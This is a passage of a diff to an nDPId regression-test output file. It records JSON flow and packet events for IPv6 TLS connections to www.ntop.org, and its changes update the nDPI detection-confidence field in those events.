00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0p
26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"} 
@@ -28,19 +28,19 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} 
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
+00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
-00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} 
